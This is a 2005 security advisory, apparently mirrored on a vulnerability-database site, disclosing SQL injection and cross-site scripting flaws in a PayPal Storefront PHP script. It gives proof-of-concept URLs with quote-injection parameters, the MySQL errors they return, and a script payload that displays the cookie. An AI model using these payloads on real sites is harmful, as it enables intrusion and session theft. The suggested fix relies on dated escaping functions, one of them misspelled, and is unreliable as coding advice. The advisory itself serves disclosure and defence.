`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Severity: High
Title: Multiple sql injection, and xss vulnerabilities in Pay pal Storefronts
Date: March 25, 2005
Vendor: http://www.esmistudio.com
Summary:
There are multiple sql injection, xss vulnerabilities in the Pay pal Storefront script.
Proof of Concept Exploits:
http://www.esmistudio.com/hv/ecdis/pages.php?idpages='SQLINJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQLINJECTION' at line 1
http://www.esmistudio.com/hv/ecdis/products1.php?id=6&id2='SQLINJECTION&subcat=Asus&p=products1
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL INJECTION ORDER BY title ASC LIMIT 0, 9' at line 1
http://www.esmistudio.com/hv/ecdis/products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&id2=10&subcat=Asus&p=products1
This shows the cookie data.
Possible fix: The usage of htmlspeacialchars(),
mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before printing data on the screen, would solve these problems.
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure coding with php.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQkO+SCZV5e8av/DUEQKK3QCg9e6f9cnOudW1EIXDXN6kxnfMDNgAoMzE
WKUuBEP0ttkc1dJBPpJGigwP
=AS7p
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation